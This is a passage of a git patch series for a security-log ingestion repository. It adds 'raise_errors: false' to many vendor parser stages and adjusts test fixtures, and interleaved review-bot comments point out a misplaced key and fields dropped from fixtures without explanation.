From de6e682a470dd0ccc7e5063c1849ce047e51619e Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 5 Nov 2024 08:28:14 +0200 Subject: [PATCH 001/150] Fix: Add raise_errors false to formats that have different input --- AWS/aws-cloudtrail/ingest/parser.yml | 1 + AWS/aws-guardduty/ingest/parser.yml | 1 + Aruba Network/aruba-os/ingest/parser.yml | 7 +++++++ Azure/azure-network-watcher/ingest/parser.yml | 1 + Azure/azure-windows/ingest/parser.yml | 2 ++ Beats/winlogbeat/ingest/parser.yml | 1 + Beats/winlogbeat/tests/security_event_5140.json | 5 ----- Beats/winlogbeat/tests/security_event_5145.json | 7 ------- CatoNetworks/cato-sase/ingest/parser.yml | 2 ++ Cisco/cisco-esa/ingest/parser.yml | 3 +++ .../cisco-esa/tests/test_attachments_details.json | 6 +----- Cisco/cisco-esa/tests/test_ingest_log2.json | 6 +----- Cisco/cisco-esa/tests/test_ingest_log5.json | 7 +------ Cisco/cisco-esa/tests/test_ingest_log7.json | 3 +-- Cisco/cisco-ios/ingest/parser.yml | 4 ++++ Cisco/cisco-ise/ingest/parser.yml | 8 ++++++++ Cisco/cisco-meraki/ingest/parser.yml | 12 ++++++++++++ Cisco/cisco-nx-os/ingest/parser.yml | 4 ++++ Cisco/cisco-secure-firewall/ingest/parser.yml | 3 +++ Cisco/cisco-secure-web-appliance/ingest/parser.yml | 3 +++ Citrix/citrix-adc/ingest/parser.yml | 5 +++++ CybeReason/malop-json/ingest/parser.yml | 1 + EfficientIP/solidserver-ddi/ingest/parser.yml | 3 +++ Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++++++++---- 24 files changed, 75 insertions(+), 34 deletions(-) diff --git a/AWS/aws-cloudtrail/ingest/parser.yml b/AWS/aws-cloudtrail/ingest/parser.yml index 265f9f7b7..31dcee72d 100644 --- a/AWS/aws-cloudtrail/ingest/parser.yml +++ b/AWS/aws-cloudtrail/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sourceIPAddress output_field: source pattern: "(%{IP:ip}|%{HOSTNAME:domain})" 
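Review bot: With `raise_errors: false` on the `sourceIPAddress` grok stage, a value matching neither `%{IP}` nor `%{HOSTNAME}` now yields no `source` output instead of a stage error, so any later stage or detection content keyed on the `source` fields has to tolerate their absence, and the mismatch is no longer visible in the pipeline's own signals. The commit adds no fixture for such an input; a test event whose `sourceIPAddress` does not match the pattern, pinning the degraded output, would keep that behaviour under test. The same applies to every other `raise_errors: false` hunk in patches 001 and 003. A one-line comment on the property would also help the next maintainer, e.g. `# input is not always an IP or hostname; skip the match rather than fail the event`.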
diff --git a/AWS/aws-guardduty/ingest/parser.yml b/AWS/aws-guardduty/ingest/parser.yml index 06512d7b1..7cb4ac969 100644 --- a/AWS/aws-guardduty/ingest/parser.yml +++ b/AWS/aws-guardduty/ingest/parser.yml @@ -13,6 +13,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.type output_field: finding pattern: "%{DATA:threat_purpose}:%{DATA:affected_resource_type}/%{WORD:threat_family_name}(.%{DATA:detection_mecanism})?(!%{DATA:artifact})?" diff --git a/Aruba Network/aruba-os/ingest/parser.yml b/Aruba Network/aruba-os/ingest/parser.yml index 8f38ca817..7c22ea1e7 100644 --- a/Aruba Network/aruba-os/ingest/parser.yml +++ b/Aruba Network/aruba-os/ingest/parser.yml @@ -4,12 +4,14 @@ pipeline: external: name: grok.match properties: + raise_errors: false pattern: '%{DATA:prefix}\:\s*%{USERNAME:obs}\s*\:\s*%{GREEDYDATA:payload}\s*' - name: parse_auth_message external: name: grok.match properties: + raise_errors: false input_field: "parse_message.message.payload" pattern: ".*?User '%{USERNAME:user_name}'.*from %{IP:src_ip}.*" filter: "{{ parse_message.message.prefix.lower() == 'auth' }}" @@ -20,6 +22,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'mgr' }}" - name: parse_ssl_message @@ -28,6 +31,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'ssl' }}" - name: parse_sntp_message @@ -36,6 +40,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?at %{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'sntp' }}" - name: parse_snmp_message 
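Review bot: Making the first `parse_message` grok non-raising (`@@ -4,12 +4,14 @@`) leaves `parse_message.message.prefix` undefined whenever that pattern does not match, and every following stage still dereferences it unconditionally in its filter, e.g. `filter: "{{ parse_message.message.prefix.lower() == 'auth' }}"`; if the template engine raises on `.lower()` of an undefined value, the failure has only moved from the grok stage into the filters, which `raise_errors` on those stages presumably does not cover. Guarding on presence, e.g. `filter: "{{ parse_message.message.prefix is defined and parse_message.message.prefix.lower() == 'auth' }}"`, would close that gap — confirm how undefined attributes are treated here. The same shape appears in cisco-ise (`{{parsed_event.message.reason.strip()}}`, `{{parsed_event.message.kv.strip()}}`) and in the Windows parser's `.replace(...)` input templates, where the dereference is in `input_field` rather than the filter. As a point of style, the new key is placed first under `properties:` in the first two Aruba stages but after `pattern:` in the others; keeping one position makes the property easier to find.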
@@ -44,6 +49,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'snmp' }}" - name: parse_dhcp_snoop_message @@ -52,6 +58,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?%{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'dhcp-snoop' }}" - name: set_ecs_fields diff --git a/Azure/azure-network-watcher/ingest/parser.yml b/Azure/azure-network-watcher/ingest/parser.yml index edca894ef..f6af50849 100644 --- a/Azure/azure-network-watcher/ingest/parser.yml +++ b/Azure/azure-network-watcher/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.get('flow.0')}}" output_field: result pattern: "%{NUMBER:timestamp},%{IP:source_ip},%{IP:destination_ip},%{NUMBER:source_port},%{NUMBER:destination_port},%{PROTOCOL:protocol},%{TRAFFICFLOW:traffic_flow},%{TRAFFICDECISION:traffic_decision}(|,(%{FLOWSTATE:flow_state}|),(%{INT:source_packets}|),(%{INT:source_bytes}|),(%{INT:destination_packets}|),(%{INT:destination_bytes}|))" diff --git a/Azure/azure-windows/ingest/parser.yml b/Azure/azure-windows/ingest/parser.yml index 4a4e76ac7..bfd2e9740 100644 --- a/Azure/azure-windows/ingest/parser.yml +++ b/Azure/azure-windows/ingest/parser.yml @@ -24,6 +24,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_windows_event.message.EventData.SubjectUserName or parse_windows_event.message.EventData.User}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -36,6 +37,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parse_windows_event.message.EventData.Hashes | lower}}" output_field: result value_sep: "=" 
diff --git a/Beats/winlogbeat/ingest/parser.yml b/Beats/winlogbeat/ingest/parser.yml index 0ffc5dbf6..7f190c1ff 100644 --- a/Beats/winlogbeat/ingest/parser.yml +++ b/Beats/winlogbeat/ingest/parser.yml @@ -10,6 +10,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.winlog.event_data.Hashes}}" output_field: hash value_sep: "=" diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json index cde1d5c3c..8413484f9 100644 --- a/Beats/winlogbeat/tests/security_event_5140.json +++ b/Beats/winlogbeat/tests/security_event_5140.json @@ -93,11 +93,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json index 99a17d54f..ec1e78d54 100644 --- a/Beats/winlogbeat/tests/security_event_5145.json +++ b/Beats/winlogbeat/tests/security_event_5145.json @@ -96,13 +96,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" diff --git a/CatoNetworks/cato-sase/ingest/parser.yml b/CatoNetworks/cato-sase/ingest/parser.yml index c3559d563..73f02ca34 100644 --- a/CatoNetworks/cato-sase/ingest/parser.yml +++ b/CatoNetworks/cato-sase/ingest/parser.yml @@ -19,6 +19,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.output.mitre_attack_tactics}}" output_field: message pattern: '%{DATA:tactic_name_1} \(%{DATA:tactic_id_1}\)\, %{DATA:tactic_name_2} \(%{DATA:tactic_id_2}\)' 
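Review bot: The 5140 and 5145 fixtures drop `event_data.AccessMaskDescription` from the expected output, yet the only parser change in this file is `raise_errors: false` on the `Hashes` kv stage, which does not touch that field; if the parser really stopped emitting it, that is a loss of a field that appears to describe the requested share access, not a fixture fix. The cisco-esa fixtures in the same commit likewise drop the extracted `url` list (test_attachments_details, test_ingest_log2, test_ingest_log5, test_ingest_log7) while only three unrelated grok stages gained `raise_errors`. Either the commit message should explain why these fields are no longer expected, or the parsers should keep producing them; please confirm which before merging.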
@@ -28,6 +29,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.output.mitre_attack_techniques}}" output_field: message pattern: '%{DATA:technique_name_1} \(%{DATA:technique_id_1}\)\, %{DATA:technique_name_2} \(%{DATA:technique_id_2}\)' diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 67b76402f..b20c3d0d7 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -32,6 +32,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.ExternalMsgID}}" output_field: message pattern: "<%{MESSAGE_ID}>|%{MESSAGE_ID}" @@ -42,6 +43,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.duser}}" output_field: message pattern: "%{GREEDYDATA:duser_name}@%{GREEDYDATA:duser_domain}" @@ -50,6 +52,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.suser}}" output_field: message pattern: "%{GREEDYDATA:suser_name}@%{GREEDYDATA:suser_domain}" diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index 56ac98c83..448ea5b15 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json @@ -54,11 +54,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [ - "http://schemas.microsoft.com/office/2004/12/omml", - "http://www.w3.org/TR/REC-html40" - ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index afb99f16d..d8d9bc5a6 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json 
@@ -57,11 +57,7 @@ "domain": { "age": "9 years 3 months 14 days" } - }, - "url": [ - "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", - "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" - ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 553425b45..a85f9845d 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -51,12 +51,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [ - "https://facebook.com/u/john.doe", - "https://tiktok.com", - "www.twitter.com" - ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 29716af19..b77951dcf 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -54,8 +54,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [] + } } }, "email": { diff --git a/Cisco/cisco-ios/ingest/parser.yml b/Cisco/cisco-ios/ingest/parser.yml index dace57b15..634407c14 100644 --- a/Cisco/cisco-ios/ingest/parser.yml +++ b/Cisco/cisco-ios/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false pattern: "(?:%{HOSTNAME:hostname}: )?%{CISCO_HEADER}: %{DATA:description}" custom_patterns: CISCO_HEADER: "%{CISCO_DATESTAMP}: %{MSG_CODE}" @@ -14,6 +15,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{LINEPROTO}|%{LINK}" custom_patterns: @@ -24,6 +26,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{SEC_LOGIN_SUCCESS}|%{SYS_LOGIN_FAILURE}|%{SYS_LOGOUT}|%{SYS_TTY_EXPIRE_TIMER}" custom_patterns: 
@@ -34,6 +37,7 @@ pipeline: filter: '{{parsed_event.message.facility in ["SEC_LOGIN", "SYS"]}}' - name: parsed_description external: + raise_errors: false name: grok.match properties: input_field: parsed_event.message.description diff --git a/Cisco/cisco-ise/ingest/parser.yml b/Cisco/cisco-ise/ingest/parser.yml index 015a469be..218053f07 100644 --- a/Cisco/cisco-ise/ingest/parser.yml +++ b/Cisco/cisco-ise/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: original.message output_field: pre_message pattern: "%{DATA:status}:%{GREEDYDATA:reason_with_kv}" @@ -13,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{pre_parsed_event.pre_message.reason_with_kv}}" output_field: time_message pattern: "%{DATA:start_of_msg}: %{DATA:reason},%{GREEDYDATA:end_of_msg}" @@ -22,6 +24,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_timestamp_in_status.time_message.end_of_msg}}" output_field: event_outcome pattern: " MESSAGE=%{DATA:outcome_msg}," @@ -31,6 +34,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_timestamp_in_status.time_message.end_of_msg}}" output_field: event_outcomes pattern: " MESSAGE=%{DATA:outcome_msg} threshold_space = %{DATA:threshold_space}, used_space = %{DATA:used_space}," @@ -40,6 +44,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{pre_parsed_event.pre_message.reason_with_kv}}" output_field: message pattern: "%{DATA:reason}:%{GREEDYDATA:kv}" @@ -49,6 +54,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.reason.strip()}}" output_field: conf_result pattern: "Configuration %{WORD:change}" 
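Review bot: In the `parsed_description` stage (`@@ -34,6 +37,7 @@`) the new key sits under `external:` rather than under `properties:`, unlike every other hunk in this patch, so it will either be rejected as an unknown `external` key or be silently ignored depending on the schema, and the stage keeps raising on non-matching descriptions. Move it next to the other properties: `properties:` / `raise_errors: false` / `input_field: parsed_event.message.description`. The stage's remaining properties are outside the hunk.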
@@ -58,6 +64,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.kv.strip()}}" output_field: result value_sep: "=" @@ -68,6 +75,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{parsed_kv_sentence.result.get("NAS Identifier")}}' output_field: adress_mac pattern: "%{MAC:adress}:%{GREEDYDATA:word}" diff --git a/Cisco/cisco-meraki/ingest/parser.yml b/Cisco/cisco-meraki/ingest/parser.yml index 7f3baaa74..8b06aa6bc 100644 --- a/Cisco/cisco-meraki/ingest/parser.yml +++ b/Cisco/cisco-meraki/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{original.message}}" output_field: message pattern: >- @@ -20,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message value_sep: "=" @@ -29,6 +31,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{kv_part_message.message.src}}" output_field: message pattern: "^%{IP:src_ip}:%{NUMBER:src_port}$" @@ -37,6 +40,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{kv_part_message.message.dst}}" output_field: message pattern: "^%{IP:dst_ip}:%{NUMBER:dst_port}$" @@ -52,6 +56,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: ^%{WORD:action}\s%{GREEDYDATA}$ @@ -62,6 +67,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: ^(%{WORD:log_subtype}|type=%{WORD:log_subtype})\s%{GREEDYDATA}$ @@ -72,6 +78,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- 
@@ -86,6 +93,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -99,6 +107,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -112,6 +121,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -124,6 +134,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -139,6 +150,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- diff --git a/Cisco/cisco-nx-os/ingest/parser.yml b/Cisco/cisco-nx-os/ingest/parser.yml index 5b8fe2aee..b9f586e96 100644 --- a/Cisco/cisco-nx-os/ingest/parser.yml +++ b/Cisco/cisco-nx-os/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{ETHPORT_IF_DOWN}|%{ETHPORT_IF_UP}|%{ETHPORT_IF}|%{ETHPORT_CONTROL}|%{ETHPORT_LAN}|%{ETHPORT_TRANSCEIVER}|%{ETHPORT_CHANNEL}" custom_patterns: @@ -30,6 +31,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{PAM_MESSAGE}|%{FILE_OPEN_FAILURE}" custom_patterns: @@ -42,6 +44,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{VSHD_CONFIG}|%{VSHD_CMD_EXEC}" custom_patterns: @@ -53,6 +56,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{ARP_DUP}" custom_patterns: 
diff --git a/Cisco/cisco-secure-firewall/ingest/parser.yml b/Cisco/cisco-secure-firewall/ingest/parser.yml index 04ce99510..00b0ffdce 100644 --- a/Cisco/cisco-secure-firewall/ingest/parser.yml +++ b/Cisco/cisco-secure-firewall/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "original.message" output_field: pre_message pattern: '((<[0-9]+>)?(%{SYSLOGTIMESTAMP:timestamp}|%{TIMESTAMP_ISO8601:timestamp})?(%{IP:log_ip})?(%{SPACE}%{DATA:log_hostname}%{SPACE})?(\:)?\%%{PRODUCT_NAME:product}\-[0-9]{1}\-%{MESSAGE_NUMBER:message_number_grok}\: %{GREEDYDATA:raw_message})|\s?%{GREEDYDATA:raw_message}' @@ -16,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: message pattern: "%{Group_1}|%{Group_2}|%{Group_3}|%{Group_4}|%{Group_5}|%{Group_6}|%{Group_7}|%{Group_8}|%{Group_9}|%{Group_10}" @@ -169,6 +171,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: parse_kv2_field value_sep: ':\s' diff --git a/Cisco/cisco-secure-web-appliance/ingest/parser.yml b/Cisco/cisco-secure-web-appliance/ingest/parser.yml index 18e6dd0c1..6f782efa3 100644 --- a/Cisco/cisco-secure-web-appliance/ingest/parser.yml +++ b/Cisco/cisco-secure-web-appliance/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: original.message output_field: message pattern: '%{PREFIX}%{NUMBER:timestamp}\s+%{NUMBER:elapsed}\s+%{IP:source_ip}\s+%{WORD:code}/%{NUMBER:status}\s+%{NUMBER:http_response_bytes}\s+%{WORD:method}\s+%{NOTSPACE:url}\s+%{NOTSPACE:username}\s+%{NOTSPACE:hierarchy_code}/(%{IP:peerhostip}|%{NOTSPACE:peerhost})\s+%{NOTSPACE:mime_type}\s+%{NOTSPACE:acl_decision}\s+<%{VERDICT:scanning_verdict_information}>\s+%{DATA:user_agent}.*' 
@@ -22,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.acl_decision output_field: result pattern: "%{WORD:decision_tag}-%{WORD:policy_group_name}-%{WORD:policy_identity}-%{WORD:outbound_malware_scanning_policy}-%{WORD:data_security_policy}-%{WORD:external_dlp_policy}-%{WORD:routing_policy}" @@ -30,6 +32,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: "{{parsed_event.message.scanning_verdict_information}}" output_field: results columnnames: diff --git a/Citrix/citrix-adc/ingest/parser.yml b/Citrix/citrix-adc/ingest/parser.yml index 9c6c377a7..712394227 100644 --- a/Citrix/citrix-adc/ingest/parser.yml +++ b/Citrix/citrix-adc/ingest/parser.yml @@ -12,6 +12,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false output_field: message pattern: '\"?\s*%{HEADER:header}\s+:\s+%{WORD:mode}\s+%{WORD:type} %{WORD:message_type} %{NUMBER:n1} %{NUMBER:n2} :\s+%{GREEDYDATA:payload}\"?' custom_patterns: @@ -44,6 +45,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: "%{SOURCE}%{SEP}(%{VSERVER}%{SEP})?(%{NAT}%{SEP})?%{DEST}.*%{BYTES_SEND}.*%{BYTES_RECV}.*" @@ -60,6 +62,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: "%{OPTION_1}|%{OPTION_2}|%{OPTION_3}" @@ -73,6 +76,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: ".*" 
@@ -83,6 +87,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: ".*ClientIP %{IP:src_ip}.*ClientPort %{POSINT:src_port}.*VserverServiceIP %{IP:vserver_ip}.*VserverServicePort %{POSINT:vserver_port}.*ClientVersion %{WORD:tls_version}.*CipherSuite %{CIPHER_SUITE:tls_suite}.*" diff --git a/CybeReason/malop-json/ingest/parser.yml b/CybeReason/malop-json/ingest/parser.yml index 80803a753..8af47763d 100644 --- a/CybeReason/malop-json/ingest/parser.yml +++ b/CybeReason/malop-json/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.name}}" output_field: technique pattern: "%{TID:id} - %{DATA:name} : %{DATA}" diff --git a/EfficientIP/solidserver-ddi/ingest/parser.yml b/EfficientIP/solidserver-ddi/ingest/parser.yml index 3c5ddd91e..219f81146 100644 --- a/EfficientIP/solidserver-ddi/ingest/parser.yml +++ b/EfficientIP/solidserver-ddi/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false output_field: message pattern: "%{EFFICIENTIP_DNS_QUERY}|%{EFFICIENTIP_DNS_ANSWER_1}|%{EFFICIENTIP_DNS_ANSWER_DEFAULT}|%{EFFICIENTIP_DNS_UPDATING_ZONE}|%{EFFICIENTIP_DNS_GUARDIAN}|%{EFFICIENTIP_DNS_GUARDIAN_LISTLOG}|%{EFFICIENTIP_RPZ_TRANSFER}|%{EFFICIENTIP_RPZ_ZONE}|%{EFFICIENTIP_RPZ_QNAME}|%{EFFICIENTIP_DNS_ERROR}|%{EFFICIENTIP_DNS_FORMAT_ERROR}|%{EFFICIENTIP_DNS_RECEIVED_NOTIFY}" custom_patterns: @@ -40,6 +41,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_event.message.dns_records}}" output_field: message pattern: ".*?%{DNS_RECORD_HTTPS}.*" @@ -52,6 +54,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_event.message.dns_records}}" output_field: message pattern: ".*?%{DNS_RECORD_RRSIG}.*" 
diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From cb3e8051f3659825e515c09a49a008d51cdf033f Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 5 Nov 2024 17:14:08 +0200 Subject: [PATCH 002/150] Add connector info to VadeSecure M365 --- VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index 8c6e799a6..da4658b6a 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml 
@@ -1,6 +1,8 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 +automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616 +automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service data_sources: From e3efa726bbbc5e423677c855d3287a3d8d717001 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:26:50 +0200 Subject: [PATCH 003/150] Add `raise_errors` --- RSA/rsa-securid/ingest/parser.yml | 1 + Retarus/retarus_email_security/ingest/parser.yml | 2 ++ .../skyhigh_secure_web_gateway/ingest/parser.yml | 1 + SonicWall/sonicwall-fw/ingest/parser.yml | 2 ++ Sophos/sophos edr/ingest/parser.yml | 5 +++++ Squid/squid/ingest/parser.yml | 1 + Systancia/cleanroom/ingest/parser.yml | 1 + Tehtris/tehtris-edr/ingest/parser.yml | 1 + ThinkstCanary/thinkst-canary/ingest/parser.yml | 1 + Umbrella/umbrella-proxy/ingest/parser.yml | 1 + Veeam/veeam_backup/ingest/parser.yml | 1 + Wallix/wallix-bastion/ingest/parser.yml | 1 + Wallix/wallix-bastion/tests/cron.json | 3 +-- Wallix/wallix-bastion/tests/pam_unix.json | 3 +-- WatchGuard/watchguard-firebox/ingest/parser.yml | 1 + Windows/windows/ingest/parser.yml | 8 ++++++++ WithSecure/withsecure-elements/ingest/parser.yml | 2 ++ 17 files changed, 31 insertions(+), 4 deletions(-) diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml index c70fee596..451c6f163 100644 --- a/RSA/rsa-securid/ingest/parser.yml +++ b/RSA/rsa-securid/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: original.message output_field: message columnnames: diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml index 6bd68803a..f55fa8ea7 100644 --- a/Retarus/retarus_email_security/ingest/parser.yml +++ b/Retarus/retarus_email_security/ingest/parser.yml 
